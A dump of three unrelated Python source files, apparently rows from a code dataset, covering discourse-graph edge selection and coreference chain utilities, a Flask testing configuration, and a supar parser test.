Value of the node attribute that all nodes must posess.
If None, returns all nodes with the given node attribute key .
data : bool
If True, results will include edge attributes.
Returns
-------
edges : generator of str
a container/list of edges (represented as (source node ID, target
node ID) tuples). If data is True, edges are represented as
(source node ID, target node ID, edge attribute dict) tuples.
"""
if attribute:
attrib_key_eval = "'{}' in edge_attribs".format(attribute)
if value is not None:
if isinstance(value, basestring):
attrib_val_eval = \
"edge_attribs['{0}'] == '{1}'".format(attribute, value)
return select_edges(
docgraph, data=data,
conditions=[attrib_key_eval, attrib_val_eval])
else: # ``value`` is a list/set/dict of values
attrib_val_evals = \
["edge_attribs['{0}'] == '{1}'".format(attribute, v)
for v in value]
results = \
[select_edges(docgraph, data=data,
conditions=[attrib_key_eval, val_eval])
for val_eval in attrib_val_evals]
# results is a list of generators
return itertools.chain(*results)
else: # yield all edges with the given attribute, regardless of value
return select_edges(docgraph, data=data, conditions=[attrib_key_eval])
else: # don't filter edges at all
return docgraph.edges_iter(data=data)
def select_edges_by(docgraph, layer=None, edge_type=None, data=False):
"""
get all edges with the given edge type and layer.
Parameters
----------
docgraph : DiscourseDocumentGraph
document graph from which the nodes will be extracted
layer : str
name of the layer
edge_type : str
Type of the edges to be extracted (Edge types are defined in the
Enum ``EdgeTypes``).
data : bool
If True, results will include edge attributes.
Returns
-------
edges : generator of str
a container/list of edges (represented as (source node ID, target
node ID) tuples). If data is True, edges are represented as
(source node ID, target node ID, edge attribute dict) tuples.
"""
edge_type_eval = "edge_attribs['edge_type'] == '{}'".format(edge_type)
layer_eval = "'{}' in edge_attribs['layers']".format(layer)
if layer is not None:
if edge_type is not None:
return select_edges(docgraph, data=data,
conditions=[edge_type_eval, layer_eval])
else: # filter by layer, but not by edge type
return select_edges(docgraph, conditions=[layer_eval], data=data)
else: # don't filter layers
if edge_type is not None: # filter by edge type, but not by layer
return select_edges(docgraph, data=data,
conditions=[edge_type_eval])
else: # neither layer, nor edge type is filtered
return docgraph.edges_iter(data=data)
def __walk_chain(rel_dict, src_id):
"""
given a dict of pointing relations and a start node, this function
will return a list of paths (each path is represented as a list of
node IDs -- from the first node of the path to the last).
Parameters
----------
rel_dict : dict
a dictionary mapping from an edge source node (node ID str)
to a set of edge target nodes (node ID str)
src_id : str
Returns
-------
paths_starting_with_id : list of list of str
each list constains a list of strings (i.e. a list of node IDs,
which represent a chain of pointing relations)
"""
paths_starting_with_id = []
for target_id in rel_dict[src_id]:
if target_id in rel_dict:
for tail in __walk_chain(rel_dict, target_id):
paths_starting_with_id.append([src_id] + tail)
else:
paths_starting_with_id.append([src_id, target_id])
return paths_starting_with_id
def get_pointing_chains(docgraph, layer=None):
"""
returns a list of chained pointing relations (e.g. coreference chains)
found in the given document graph.
Parameters
----------
docgraph : DiscourseDocumentGraph
a text with annotations, represented by a document graph
layer : str or None
If layer is specifid, this function will only return pointing relations
belonging to that layer.
"""
pointing_relations = select_edges_by(docgraph, layer=layer,
edge_type=EdgeTypes.pointing_relation)
# a markable can point to more than one antecedent, cf. Issue #40
rel_dict = defaultdict(set)
for src_id, target_id in pointing_relations:
rel_dict[src_id].add(target_id)
all_chains = [__walk_chain(rel_dict, src_id)
for src_id in rel_dict.iterkeys()]
# don't return partial chains, i.e. instead of returning [a,b], [b,c] and
# [a,b,c,d], just return [a,b,c,d]
unique_chains = []
for i, src_id_chains in enumerate(all_chains):
# there will be at least one chain in this list and
# its first element is the from ID
src_id = src_id_chains[0][0]
# chain lists not starting with src_id
other_chainlists = all_chains[:i] + all_chains[i+1:]
if not any((src_id in chain
for chain_list in other_chainlists
for chain in chain_list)):
unique_chains.extend(src_id_chains)
return unique_chains
def layer2namespace(layer):
"""
converts the name of a layer into the name of its namespace, e.g.
'mmax:token' --> 'mmax'
"""
return layer.split(':')[0]
|
"""Configuration for running the test suite."""
from .base import BaseConfig
class TestingConfig(BaseConfig):
"""Uses an in-memory sqlite database for running tests."""
# NOTE: Flask ignores variables unless they are in all caps
TESTING = True
# DATABASE CONFIGURATION
SQLALCHEMY_DATABASE_URI = 'sqlite://'
|
# -*- coding: utf-8 -*-
from supar import Parser
import supar
def test_parse():
sentence = ['The', 'dog', 'chases', 'the', 'cat', '.']
for name in supar.PRETRAINED:
parser = Parser.load(name)
parser.predict([sentence], prob=True)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.